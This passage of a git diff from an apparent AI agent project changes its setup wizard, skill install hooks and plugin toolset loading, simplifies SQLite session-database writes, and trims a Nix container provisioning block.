"swe-rex[modal]",
|
||||
],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
else:
|
||||
result = subprocess.run(
|
||||
[sys.executable, "-m", "pip", "install", "modal"],
|
||||
[sys.executable, "-m", "pip", "install", "swe-rex[modal]"],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if result.returncode == 0:
|
||||
print_success("modal SDK installed")
|
||||
print_success("swe-rex[modal] installed")
|
||||
else:
|
||||
print_warning(
|
||||
"Install failed — run manually: pip install modal"
|
||||
"Install failed — run manually: pip install 'swe-rex[modal]'"
|
||||
)
|
||||
|
||||
# Modal token
|
||||
@@ -2993,95 +2968,6 @@ def setup_tools(config: dict, first_install: bool = False):
|
||||
tools_command(first_install=first_install, config=config)
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Post-Migration Section Skip Logic
|
||||
# =============================================================================
|
||||
|
||||
|
||||
def _get_section_config_summary(config: dict, section_key: str) -> Optional[str]:
|
||||
"""Return a short summary if a setup section is already configured, else None.
|
||||
|
||||
Used after OpenClaw migration to detect which sections can be skipped.
|
||||
``get_env_value`` is the module-level import from hermes_cli.config
|
||||
so that test patches on ``setup_mod.get_env_value`` take effect.
|
||||
"""
|
||||
if section_key == "model":
|
||||
has_key = bool(
|
||||
get_env_value("OPENROUTER_API_KEY")
|
||||
or get_env_value("OPENAI_API_KEY")
|
||||
or get_env_value("ANTHROPIC_API_KEY")
|
||||
)
|
||||
if not has_key:
|
||||
# Check for OAuth providers
|
||||
try:
|
||||
from hermes_cli.auth import get_active_provider
|
||||
if get_active_provider():
|
||||
has_key = True
|
||||
except Exception:
|
||||
pass
|
||||
if not has_key:
|
||||
return None
|
||||
model = config.get("model")
|
||||
if isinstance(model, str) and model.strip():
|
||||
return model.strip()
|
||||
if isinstance(model, dict):
|
||||
return str(model.get("default") or model.get("model") or "configured")
|
||||
return "configured"
|
||||
|
||||
elif section_key == "terminal":
|
||||
backend = config.get("terminal", {}).get("backend", "local")
|
||||
return f"backend: {backend}"
|
||||
|
||||
elif section_key == "agent":
|
||||
max_turns = config.get("agent", {}).get("max_turns", 90)
|
||||
return f"max turns: {max_turns}"
|
||||
|
||||
elif section_key == "gateway":
|
||||
platforms = []
|
||||
if get_env_value("TELEGRAM_BOT_TOKEN"):
|
||||
platforms.append("Telegram")
|
||||
if get_env_value("DISCORD_BOT_TOKEN"):
|
||||
platforms.append("Discord")
|
||||
if get_env_value("SLACK_BOT_TOKEN"):
|
||||
platforms.append("Slack")
|
||||
if get_env_value("WHATSAPP_PHONE_NUMBER_ID"):
|
||||
platforms.append("WhatsApp")
|
||||
if get_env_value("SIGNAL_ACCOUNT"):
|
||||
platforms.append("Signal")
|
||||
if platforms:
|
||||
return ", ".join(platforms)
|
||||
return None # No platforms configured — section must run
|
||||
|
||||
elif section_key == "tools":
|
||||
tools = []
|
||||
if get_env_value("ELEVENLABS_API_KEY"):
|
||||
tools.append("TTS/ElevenLabs")
|
||||
if get_env_value("BROWSERBASE_API_KEY"):
|
||||
tools.append("Browser")
|
||||
if get_env_value("FIRECRAWL_API_KEY"):
|
||||
tools.append("Firecrawl")
|
||||
if tools:
|
||||
return ", ".join(tools)
|
||||
return None
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def _skip_configured_section(
|
||||
config: dict, section_key: str, label: str
|
||||
) -> bool:
|
||||
"""Show an already-configured section summary and offer to skip.
|
||||
|
||||
Returns True if the user chose to skip, False if the section should run.
|
||||
"""
|
||||
summary = _get_section_config_summary(config, section_key)
|
||||
if not summary:
|
||||
return False
|
||||
print()
|
||||
print_success(f" {label}: {summary}")
|
||||
return not prompt_yes_no(f" Reconfigure {label.lower()}?", default=False)
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# OpenClaw Migration
|
||||
# =============================================================================
|
||||
@@ -3153,7 +3039,7 @@ def _offer_openclaw_migration(hermes_home: Path) -> bool:
|
||||
target_root=hermes_home.resolve(),
|
||||
execute=True,
|
||||
workspace_target=None,
|
||||
overwrite=True,
|
||||
overwrite=False,
|
||||
migrate_secrets=True,
|
||||
output_dir=None,
|
||||
selected_options=selected,
|
||||
@@ -3309,8 +3195,6 @@ def run_setup_wizard(args):
|
||||
)
|
||||
)
|
||||
|
||||
migration_ran = False
|
||||
|
||||
if is_existing:
|
||||
# ── Returning User Menu ──
|
||||
print()
|
||||
@@ -3380,8 +3264,7 @@ def run_setup_wizard(args):
|
||||
return
|
||||
|
||||
# Offer OpenClaw migration before configuration begins
|
||||
migration_ran = _offer_openclaw_migration(hermes_home)
|
||||
if migration_ran:
|
||||
if _offer_openclaw_migration(hermes_home):
|
||||
# Reload config in case migration wrote to it
|
||||
config = load_config()
|
||||
|
||||
@@ -3394,31 +3277,20 @@ def run_setup_wizard(args):
|
||||
print()
|
||||
print_info("You can edit these files directly or use 'hermes config edit'")
|
||||
|
||||
if migration_ran:
|
||||
print()
|
||||
print_info("Settings were imported from OpenClaw.")
|
||||
print_info("Each section below will show what was imported — press Enter to keep,")
|
||||
print_info("or choose to reconfigure if needed.")
|
||||
|
||||
# Section 1: Model & Provider
|
||||
if not (migration_ran and _skip_configured_section(config, "model", "Model & Provider")):
|
||||
setup_model_provider(config)
|
||||
setup_model_provider(config)
|
||||
|
||||
# Section 2: Terminal Backend
|
||||
if not (migration_ran and _skip_configured_section(config, "terminal", "Terminal Backend")):
|
||||
setup_terminal_backend(config)
|
||||
setup_terminal_backend(config)
|
||||
|
||||
# Section 3: Agent Settings
|
||||
if not (migration_ran and _skip_configured_section(config, "agent", "Agent Settings")):
|
||||
setup_agent_settings(config)
|
||||
setup_agent_settings(config)
|
||||
|
||||
# Section 4: Messaging Platforms
|
||||
if not (migration_ran and _skip_configured_section(config, "gateway", "Messaging Platforms")):
|
||||
setup_gateway(config)
|
||||
setup_gateway(config)
|
||||
|
||||
# Section 5: Tools
|
||||
if not (migration_ran and _skip_configured_section(config, "tools", "Tools")):
|
||||
setup_tools(config, first_install=not is_existing)
|
||||
setup_tools(config, first_install=not is_existing)
|
||||
|
||||
# Save and show summary
|
||||
save_config(config)
|
||||
|
||||
@@ -417,13 +417,6 @@ def do_install(identifier: str, category: str = "", force: bool = False,
|
||||
c.print(f"[bold green]Installed:[/] {install_dir.relative_to(SKILLS_DIR)}")
|
||||
c.print(f"[dim]Files: {', '.join(bundle.files.keys())}[/]\n")
|
||||
|
||||
# Invalidate the skills prompt cache so the new skill appears immediately
|
||||
try:
|
||||
from agent.prompt_builder import clear_skills_system_prompt_cache
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
|
||||
def do_inspect(identifier: str, console: Optional[Console] = None) -> None:
|
||||
"""Preview a skill's SKILL.md content without installing."""
|
||||
@@ -630,11 +623,6 @@ def do_uninstall(name: str, console: Optional[Console] = None,
|
||||
success, msg = uninstall_skill(name)
|
||||
if success:
|
||||
c.print(f"[bold green]{msg}[/]\n")
|
||||
try:
|
||||
from agent.prompt_builder import clear_skills_system_prompt_cache
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
except Exception:
|
||||
pass
|
||||
else:
|
||||
c.print(f"[bold red]Error:[/] {msg}\n")
|
||||
|
||||
|
||||
@@ -108,8 +108,7 @@ def _get_effective_configurable_toolsets():
|
||||
"""
|
||||
result = list(CONFIGURABLE_TOOLSETS)
|
||||
try:
|
||||
from hermes_cli.plugins import discover_plugins, get_plugin_toolsets
|
||||
discover_plugins() # idempotent — ensures plugins are loaded
|
||||
from hermes_cli.plugins import get_plugin_toolsets
|
||||
result.extend(get_plugin_toolsets())
|
||||
except Exception:
|
||||
pass
|
||||
@@ -119,8 +118,7 @@ def _get_effective_configurable_toolsets():
|
||||
def _get_plugin_toolset_keys() -> set:
|
||||
"""Return the set of toolset keys provided by plugins."""
|
||||
try:
|
||||
from hermes_cli.plugins import discover_plugins, get_plugin_toolsets
|
||||
discover_plugins() # idempotent — ensures plugins are loaded
|
||||
from hermes_cli.plugins import get_plugin_toolsets
|
||||
return {ts_key for ts_key, _, _ in get_plugin_toolsets()}
|
||||
except Exception:
|
||||
return set()
|
||||
@@ -135,7 +133,6 @@ PLATFORMS = {
|
||||
"signal": {"label": "📡 Signal", "default_toolset": "hermes-signal"},
|
||||
"homeassistant": {"label": "🏠 Home Assistant", "default_toolset": "hermes-homeassistant"},
|
||||
"email": {"label": "📧 Email", "default_toolset": "hermes-email"},
|
||||
"matrix": {"label": "💬 Matrix", "default_toolset": "hermes-matrix"},
|
||||
"dingtalk": {"label": "💬 DingTalk", "default_toolset": "hermes-dingtalk"},
|
||||
"api_server": {"label": "🌐 API Server", "default_toolset": "hermes-api-server"},
|
||||
}
|
||||
|
||||
+84
-304
@@ -15,20 +15,15 @@ Key design decisions:
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import sqlite3
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
from hermes_constants import get_hermes_home
|
||||
from typing import Any, Callable, Dict, List, Optional, TypeVar
|
||||
from typing import Dict, Any, List, Optional
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
T = TypeVar("T")
|
||||
|
||||
DEFAULT_DB_PATH = get_hermes_home() / "state.db"
|
||||
|
||||
@@ -121,38 +116,18 @@ class SessionDB:
|
||||
single writer via WAL mode). Each method opens its own cursor.
|
||||
"""
|
||||
|
||||
# ── Write-contention tuning ──
|
||||
# With multiple hermes processes (gateway + CLI sessions + worktree agents)
|
||||
# all sharing one state.db, WAL write-lock contention causes visible TUI
|
||||
# freezes. SQLite's built-in busy handler uses a deterministic sleep
|
||||
# schedule that causes convoy effects under high concurrency.
|
||||
#
|
||||
# Instead, we keep the SQLite timeout short (1s) and handle retries at the
|
||||
# application level with random jitter, which naturally staggers competing
|
||||
# writers and avoids the convoy.
|
||||
_WRITE_MAX_RETRIES = 15
|
||||
_WRITE_RETRY_MIN_S = 0.020 # 20ms
|
||||
_WRITE_RETRY_MAX_S = 0.150 # 150ms
|
||||
# Attempt a PASSIVE WAL checkpoint every N successful writes.
|
||||
_CHECKPOINT_EVERY_N_WRITES = 50
|
||||
|
||||
def __init__(self, db_path: Path = None):
|
||||
self.db_path = db_path or DEFAULT_DB_PATH
|
||||
self.db_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
self._lock = threading.Lock()
|
||||
self._write_count = 0
|
||||
self._conn = sqlite3.connect(
|
||||
str(self.db_path),
|
||||
check_same_thread=False,
|
||||
# Short timeout — application-level retry with random jitter
|
||||
# handles contention instead of sitting in SQLite's internal
|
||||
# busy handler for up to 30s.
|
||||
timeout=1.0,
|
||||
# Autocommit mode: Python's default isolation_level="" auto-starts
|
||||
# transactions on DML, which conflicts with our explicit
|
||||
# BEGIN IMMEDIATE. None = we manage transactions ourselves.
|
||||
isolation_level=None,
|
||||
# 30s gives the WAL writer (CLI or gateway) time to finish a batch
|
||||
# flush before the concurrent reader/writer gives up. 10s was too
|
||||
# short when the CLI is doing frequent memory flushes.
|
||||
timeout=30.0,
|
||||
)
|
||||
self._conn.row_factory = sqlite3.Row
|
||||
self._conn.execute("PRAGMA journal_mode=WAL")
|
||||
@@ -160,96 +135,6 @@ class SessionDB:
|
||||
|
||||
self._init_schema()
|
||||
|
||||
# ── Core write helper ──
|
||||
|
||||
def _execute_write(self, fn: Callable[[sqlite3.Connection], T]) -> T:
|
||||
"""Execute a write transaction with BEGIN IMMEDIATE and jitter retry.
|
||||
|
||||
*fn* receives the connection and should perform INSERT/UPDATE/DELETE
|
||||
statements. The caller must NOT call ``commit()`` — that's handled
|
||||
here after *fn* returns.
|
||||
|
||||
BEGIN IMMEDIATE acquires the WAL write lock at transaction start
|
||||
(not at commit time), so lock contention surfaces immediately.
|
||||
On ``database is locked``, we release the Python lock, sleep a
|
||||
random 20-150ms, and retry — breaking the convoy pattern that
|
||||
SQLite's built-in deterministic backoff creates.
|
||||
|
||||
Returns whatever *fn* returns.
|
||||
"""
|
||||
last_err: Optional[Exception] = None
|
||||
for attempt in range(self._WRITE_MAX_RETRIES):
|
||||
try:
|
||||
with self._lock:
|
||||
self._conn.execute("BEGIN IMMEDIATE")
|
||||
try:
|
||||
result = fn(self._conn)
|
||||
self._conn.commit()
|
||||
except BaseException:
|
||||
try:
|
||||
self._conn.rollback()
|
||||
except Exception:
|
||||
pass
|
||||
raise
|
||||
# Success — periodic best-effort checkpoint.
|
||||
self._write_count += 1
|
||||
if self._write_count % self._CHECKPOINT_EVERY_N_WRITES == 0:
|
||||
self._try_wal_checkpoint()
|
||||
return result
|
||||
except sqlite3.OperationalError as exc:
|
||||
err_msg = str(exc).lower()
|
||||
if "locked" in err_msg or "busy" in err_msg:
|
||||
last_err = exc
|
||||
if attempt < self._WRITE_MAX_RETRIES - 1:
|
||||
jitter = random.uniform(
|
||||
self._WRITE_RETRY_MIN_S,
|
||||
self._WRITE_RETRY_MAX_S,
|
||||
)
|
||||
time.sleep(jitter)
|
||||
continue
|
||||
# Non-lock error or retries exhausted — propagate.
|
||||
raise
|
||||
# Retries exhausted (shouldn't normally reach here).
|
||||
raise last_err or sqlite3.OperationalError(
|
||||
"database is locked after max retries"
|
||||
)
|
||||
|
||||
def _try_wal_checkpoint(self) -> None:
|
||||
"""Best-effort PASSIVE WAL checkpoint. Never blocks, never raises.
|
||||
|
||||
Flushes committed WAL frames back into the main DB file for any
|
||||
frames that no other connection currently needs. Keeps the WAL
|
||||
from growing unbounded when many processes hold persistent
|
||||
connections.
|
||||
"""
|
||||
try:
|
||||
with self._lock:
|
||||
result = self._conn.execute(
|
||||
"PRAGMA wal_checkpoint(PASSIVE)"
|
||||
).fetchone()
|
||||
if result and result[1] > 0:
|
||||
logger.debug(
|
||||
"WAL checkpoint: %d/%d pages checkpointed",
|
||||
result[2], result[1],
|
||||
)
|
||||
except Exception:
|
||||
pass # Best effort — never fatal.
|
||||
|
||||
def close(self):
|
||||
"""Close the database connection.
|
||||
|
||||
Attempts a PASSIVE WAL checkpoint first so that exiting processes
|
||||
help keep the WAL file from growing unbounded.
|
||||
"""
|
||||
with self._lock:
|
||||
if self._conn:
|
||||
try:
|
||||
self._conn.execute("PRAGMA wal_checkpoint(PASSIVE)")
|
||||
except Exception:
|
||||
pass
|
||||
self._conn.close()
|
||||
self._conn = None
|
||||
|
||||
def _init_schema(self):
|
||||
"""Create tables and FTS if they don't exist, run migrations."""
|
||||
cursor = self._conn.cursor()
|
||||
@@ -371,8 +256,8 @@ class SessionDB:
|
||||
parent_session_id: str = None,
|
||||
) -> str:
|
||||
"""Create a new session record. Returns the session_id."""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"""INSERT OR IGNORE INTO sessions (id, source, user_id, model, model_config,
|
||||
system_prompt, parent_session_id, started_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, ?)""",
|
||||
@@ -387,35 +272,26 @@ class SessionDB:
|
||||
time.time(),
|
||||
),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
return session_id
|
||||
|
||||
def end_session(self, session_id: str, end_reason: str) -> None:
|
||||
"""Mark a session as ended."""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"UPDATE sessions SET ended_at = ?, end_reason = ? WHERE id = ?",
|
||||
(time.time(), end_reason, session_id),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
|
||||
def reopen_session(self, session_id: str) -> None:
|
||||
"""Clear ended_at/end_reason so a session can be resumed."""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
"UPDATE sessions SET ended_at = NULL, end_reason = NULL WHERE id = ?",
|
||||
(session_id,),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
|
||||
def update_system_prompt(self, session_id: str, system_prompt: str) -> None:
|
||||
"""Store the full assembled system prompt snapshot."""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"UPDATE sessions SET system_prompt = ? WHERE id = ?",
|
||||
(system_prompt, session_id),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
|
||||
def update_token_counts(
|
||||
self,
|
||||
@@ -434,39 +310,11 @@ class SessionDB:
|
||||
billing_provider: Optional[str] = None,
|
||||
billing_base_url: Optional[str] = None,
|
||||
billing_mode: Optional[str] = None,
|
||||
absolute: bool = False,
|
||||
) -> None:
|
||||
"""Update token counters and backfill model if not already set.
|
||||
|
||||
When *absolute* is False (default), values are **incremented** — use
|
||||
this for per-API-call deltas (CLI path).
|
||||
|
||||
When *absolute* is True, values are **set directly** — use this when
|
||||
the caller already holds cumulative totals (gateway path, where the
|
||||
cached agent accumulates across messages).
|
||||
"""
|
||||
if absolute:
|
||||
sql = """UPDATE sessions SET
|
||||
input_tokens = ?,
|
||||
output_tokens = ?,
|
||||
cache_read_tokens = ?,
|
||||
cache_write_tokens = ?,
|
||||
reasoning_tokens = ?,
|
||||
estimated_cost_usd = COALESCE(?, 0),
|
||||
actual_cost_usd = CASE
|
||||
WHEN ? IS NULL THEN actual_cost_usd
|
||||
ELSE ?
|
||||
END,
|
||||
cost_status = COALESCE(?, cost_status),
|
||||
cost_source = COALESCE(?, cost_source),
|
||||
pricing_version = COALESCE(?, pricing_version),
|
||||
billing_provider = COALESCE(billing_provider, ?),
|
||||
billing_base_url = COALESCE(billing_base_url, ?),
|
||||
billing_mode = COALESCE(billing_mode, ?),
|
||||
model = COALESCE(model, ?)
|
||||
WHERE id = ?"""
|
||||
else:
|
||||
sql = """UPDATE sessions SET
|
||||
"""Increment token counters and backfill model if not already set."""
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"""UPDATE sessions SET
|
||||
input_tokens = input_tokens + ?,
|
||||
output_tokens = output_tokens + ?,
|
||||
cache_read_tokens = cache_read_tokens + ?,
|
||||
@@ -484,94 +332,6 @@ class SessionDB:
|
||||
billing_base_url = COALESCE(billing_base_url, ?),
|
||||
billing_mode = COALESCE(billing_mode, ?),
|
||||
model = COALESCE(model, ?)
|
||||
WHERE id = ?"""
|
||||
params = (
|
||||
input_tokens,
|
||||
output_tokens,
|
||||
cache_read_tokens,
|
||||
cache_write_tokens,
|
||||
reasoning_tokens,
|
||||
estimated_cost_usd,
|
||||
actual_cost_usd,
|
||||
actual_cost_usd,
|
||||
cost_status,
|
||||
cost_source,
|
||||
pricing_version,
|
||||
billing_provider,
|
||||
billing_base_url,
|
||||
billing_mode,
|
||||
model,
|
||||
session_id,
|
||||
)
|
||||
def _do(conn):
|
||||
conn.execute(sql, params)
|
||||
self._execute_write(_do)
|
||||
|
||||
def ensure_session(
|
||||
self,
|
||||
session_id: str,
|
||||
source: str = "unknown",
|
||||
model: str = None,
|
||||
) -> None:
|
||||
"""Ensure a session row exists, creating it with minimal metadata if absent.
|
||||
|
||||
Used by _flush_messages_to_session_db to recover from a failed
|
||||
create_session() call (e.g. transient SQLite lock at agent startup).
|
||||
INSERT OR IGNORE is safe to call even when the row already exists.
|
||||
"""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
"""INSERT OR IGNORE INTO sessions
|
||||
(id, source, model, started_at)
|
||||
VALUES (?, ?, ?, ?)""",
|
||||
(session_id, source, model, time.time()),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
|
||||
def set_token_counts(
|
||||
self,
|
||||
session_id: str,
|
||||
input_tokens: int = 0,
|
||||
output_tokens: int = 0,
|
||||
model: str = None,
|
||||
cache_read_tokens: int = 0,
|
||||
cache_write_tokens: int = 0,
|
||||
reasoning_tokens: int = 0,
|
||||
estimated_cost_usd: Optional[float] = None,
|
||||
actual_cost_usd: Optional[float] = None,
|
||||
cost_status: Optional[str] = None,
|
||||
cost_source: Optional[str] = None,
|
||||
pricing_version: Optional[str] = None,
|
||||
billing_provider: Optional[str] = None,
|
||||
billing_base_url: Optional[str] = None,
|
||||
billing_mode: Optional[str] = None,
|
||||
) -> None:
|
||||
"""Set token counters to absolute values (not increment).
|
||||
|
||||
Use this when the caller provides cumulative totals from a completed
|
||||
conversation run (e.g. the gateway, where the cached agent's
|
||||
session_prompt_tokens already reflects the running total).
|
||||
"""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
"""UPDATE sessions SET
|
||||
input_tokens = ?,
|
||||
output_tokens = ?,
|
||||
cache_read_tokens = ?,
|
||||
cache_write_tokens = ?,
|
||||
reasoning_tokens = ?,
|
||||
estimated_cost_usd = ?,
|
||||
actual_cost_usd = CASE
|
||||
WHEN ? IS NULL THEN actual_cost_usd
|
||||
ELSE ?
|
||||
END,
|
||||
cost_status = COALESCE(?, cost_status),
|
||||
cost_source = COALESCE(?, cost_source),
|
||||
pricing_version = COALESCE(?, pricing_version),
|
||||
billing_provider = COALESCE(billing_provider, ?),
|
||||
billing_base_url = COALESCE(billing_base_url, ?),
|
||||
billing_mode = COALESCE(billing_mode, ?),
|
||||
model = COALESCE(model, ?)
|
||||
WHERE id = ?""",
|
||||
(
|
||||
input_tokens,
|
||||
@@ -592,7 +352,28 @@ class SessionDB:
|
||||
session_id,
|
||||
),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
|
||||
def ensure_session(
|
||||
self,
|
||||
session_id: str,
|
||||
source: str = "unknown",
|
||||
model: str = None,
|
||||
) -> None:
|
||||
"""Ensure a session row exists, creating it with minimal metadata if absent.
|
||||
|
||||
Used by _flush_messages_to_session_db to recover from a failed
|
||||
create_session() call (e.g. transient SQLite lock at agent startup).
|
||||
INSERT OR IGNORE is safe to call even when the row already exists.
|
||||
"""
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"""INSERT OR IGNORE INTO sessions
|
||||
(id, source, model, started_at)
|
||||
VALUES (?, ?, ?, ?)""",
|
||||
(session_id, source, model, time.time()),
|
||||
)
|
||||
self._conn.commit()
|
||||
|
||||
def get_session(self, session_id: str) -> Optional[Dict[str, Any]]:
|
||||
"""Get a session by ID."""
|
||||
@@ -686,10 +467,10 @@ class SessionDB:
|
||||
Empty/whitespace-only strings are normalized to None (clearing the title).
|
||||
"""
|
||||
title = self.sanitize_title(title)
|
||||
def _do(conn):
|
||||
with self._lock:
|
||||
if title:
|
||||
# Check uniqueness (allow the same session to keep its own title)
|
||||
cursor = conn.execute(
|
||||
cursor = self._conn.execute(
|
||||
"SELECT id FROM sessions WHERE title = ? AND id != ?",
|
||||
(title, session_id),
|
||||
)
|
||||
@@ -698,12 +479,12 @@ class SessionDB:
|
||||
raise ValueError(
|
||||
f"Title '{title}' is already in use by session {conflict['id']}"
|
||||
)
|
||||
cursor = conn.execute(
|
||||
cursor = self._conn.execute(
|
||||
"UPDATE sessions SET title = ? WHERE id = ?",
|
||||
(title, session_id),
|
||||
)
|
||||
return cursor.rowcount
|
||||
rowcount = self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
rowcount = cursor.rowcount
|
||||
return rowcount > 0
|
||||
|
||||
def get_session_title(self, session_id: str) -> Optional[str]:
|
||||
@@ -875,24 +656,17 @@ class SessionDB:
|
||||
Also increments the session's message_count (and tool_call_count
|
||||
if role is 'tool' or tool_calls is present).
|
||||
"""
|
||||
# Serialize structured fields to JSON before entering the write txn
|
||||
reasoning_details_json = (
|
||||
json.dumps(reasoning_details)
|
||||
if reasoning_details else None
|
||||
)
|
||||
codex_items_json = (
|
||||
json.dumps(codex_reasoning_items)
|
||||
if codex_reasoning_items else None
|
||||
)
|
||||
tool_calls_json = json.dumps(tool_calls) if tool_calls else None
|
||||
|
||||
# Pre-compute tool call count
|
||||
num_tool_calls = 0
|
||||
if tool_calls is not None:
|
||||
num_tool_calls = len(tool_calls) if isinstance(tool_calls, list) else 1
|
||||
|
||||
def _do(conn):
|
||||
cursor = conn.execute(
|
||||
with self._lock:
|
||||
# Serialize structured fields to JSON for storage
|
||||
reasoning_details_json = (
|
||||
json.dumps(reasoning_details)
|
||||
if reasoning_details else None
|
||||
)
|
||||
codex_items_json = (
|
||||
json.dumps(codex_reasoning_items)
|
||||
if codex_reasoning_items else None
|
||||
)
|
||||
cursor = self._conn.execute(
|
||||
"""INSERT INTO messages (session_id, role, content, tool_call_id,
|
||||
tool_calls, tool_name, timestamp, token_count, finish_reason,
|
||||
reasoning, reasoning_details, codex_reasoning_items)
|
||||
@@ -902,7 +676,7 @@ class SessionDB:
|
||||
role,
|
||||
content,
|
||||
tool_call_id,
|
||||
tool_calls_json,
|
||||
json.dumps(tool_calls) if tool_calls else None,
|
||||
tool_name,
|
||||
time.time(),
|
||||
token_count,
|
||||
@@ -915,20 +689,25 @@ class SessionDB:
|
||||
msg_id = cursor.lastrowid
|
||||
|
||||
# Update counters
|
||||
# Count actual tool calls from the tool_calls list (not from tool responses).
|
||||
# A single assistant message can contain multiple parallel tool calls.
|
||||
num_tool_calls = 0
|
||||
if tool_calls is not None:
|
||||
num_tool_calls = len(tool_calls) if isinstance(tool_calls, list) else 1
|
||||
if num_tool_calls > 0:
|
||||
conn.execute(
|
||||
self._conn.execute(
|
||||
"""UPDATE sessions SET message_count = message_count + 1,
|
||||
tool_call_count = tool_call_count + ? WHERE id = ?""",
|
||||
(num_tool_calls, session_id),
|
||||
)
|
||||
else:
|
||||
conn.execute(
|
||||
self._conn.execute(
|
||||
"UPDATE sessions SET message_count = message_count + 1 WHERE id = ?",
|
||||
(session_id,),
|
||||
)
|
||||
return msg_id
|
||||
|
||||
return self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
return msg_id
|
||||
|
||||
def get_messages(self, session_id: str) -> List[Dict[str, Any]]:
|
||||
"""Load all messages for a session, ordered by timestamp."""
|
||||
@@ -1222,53 +1001,54 @@ class SessionDB:
|
||||
|
||||
def clear_messages(self, session_id: str) -> None:
|
||||
"""Delete all messages for a session and reset its counters."""
|
||||
def _do(conn):
|
||||
conn.execute(
|
||||
with self._lock:
|
||||
self._conn.execute(
|
||||
"DELETE FROM messages WHERE session_id = ?", (session_id,)
|
||||
)
|
||||
conn.execute(
|
||||
self._conn.execute(
|
||||
"UPDATE sessions SET message_count = 0, tool_call_count = 0 WHERE id = ?",
|
||||
(session_id,),
|
||||
)
|
||||
self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
|
||||
def delete_session(self, session_id: str) -> bool:
|
||||
"""Delete a session and all its messages. Returns True if found."""
|
||||
def _do(conn):
|
||||
cursor = conn.execute(
|
||||
with self._lock:
|
||||
cursor = self._conn.execute(
|
||||
"SELECT COUNT(*) FROM sessions WHERE id = ?", (session_id,)
|
||||
)
|
||||
if cursor.fetchone()[0] == 0:
|
||||
return False
|
||||
conn.execute("DELETE FROM messages WHERE session_id = ?", (session_id,))
|
||||
conn.execute("DELETE FROM sessions WHERE id = ?", (session_id,))
|
||||
self._conn.execute("DELETE FROM messages WHERE session_id = ?", (session_id,))
|
||||
self._conn.execute("DELETE FROM sessions WHERE id = ?", (session_id,))
|
||||
self._conn.commit()
|
||||
return True
|
||||
return self._execute_write(_do)
|
||||
|
||||
def prune_sessions(self, older_than_days: int = 90, source: str = None) -> int:
|
||||
"""
|
||||
Delete sessions older than N days. Returns count of deleted sessions.
|
||||
Only prunes ended sessions (not active ones).
|
||||
"""
|
||||
cutoff = time.time() - (older_than_days * 86400)
|
||||
import time as _time
|
||||
cutoff = _time.time() - (older_than_days * 86400)
|
||||
|
||||
def _do(conn):
|
||||
with self._lock:
|
||||
if source:
|
||||
cursor = conn.execute(
|
||||
cursor = self._conn.execute(
|
||||
"""SELECT id FROM sessions
|
||||
WHERE started_at < ? AND ended_at IS NOT NULL AND source = ?""",
|
||||
(cutoff, source),
|
||||
)
|
||||
else:
|
||||
cursor = conn.execute(
|
||||
cursor = self._conn.execute(
|
||||
"SELECT id FROM sessions WHERE started_at < ? AND ended_at IS NOT NULL",
|
||||
(cutoff,),
|
||||
)
|
||||
session_ids = [row["id"] for row in cursor.fetchall()]
|
||||
|
||||
for sid in session_ids:
|
||||
conn.execute("DELETE FROM messages WHERE session_id = ?", (sid,))
|
||||
conn.execute("DELETE FROM sessions WHERE id = ?", (sid,))
|
||||
return len(session_ids)
|
||||
self._conn.execute("DELETE FROM messages WHERE session_id = ?", (sid,))
|
||||
self._conn.execute("DELETE FROM sessions WHERE id = ?", (sid,))
|
||||
|
||||
return self._execute_write(_do)
|
||||
self._conn.commit()
|
||||
return len(session_ids)
|
||||
|
||||
+3
-38
@@ -10,12 +10,6 @@
|
||||
# container recreation. Environment variables are written to $HERMES_HOME/.env
|
||||
# and read by hermes at startup — no container recreation needed for env changes.
|
||||
#
|
||||
# Tool resolution: the hermes wrapper uses --suffix PATH for nix store tools,
|
||||
# so apt/uv-installed versions take priority. The container entrypoint provisions
|
||||
# extensible tools on first boot: nodejs/npm via apt, uv via curl, and a Python
|
||||
# 3.11 venv (bootstrapped entirely by uv) at ~/.venv with pip seeded. Agents get
|
||||
# writable tool prefixes for npm i -g, pip install, uv tool install, etc.
|
||||
#
|
||||
# Usage:
|
||||
# services.hermes-agent = {
|
||||
# enable = true;
|
||||
@@ -117,45 +111,16 @@
|
||||
chown -R "$HERMES_UID:$HERMES_GID" "$HERMES_HOME"
|
||||
fi
|
||||
|
||||
# ── Provision apt packages (first boot only, cached in writable layer) ──
|
||||
# sudo: agent self-modification
|
||||
# nodejs/npm: writable node so npm i -g works (nix store copies are read-only)
|
||||
# curl: needed for uv installer
|
||||
if [ ! -f /var/lib/hermes-tools-provisioned ] && command -v apt-get >/dev/null 2>&1; then
|
||||
echo "First boot: provisioning agent tools..."
|
||||
apt-get update -qq
|
||||
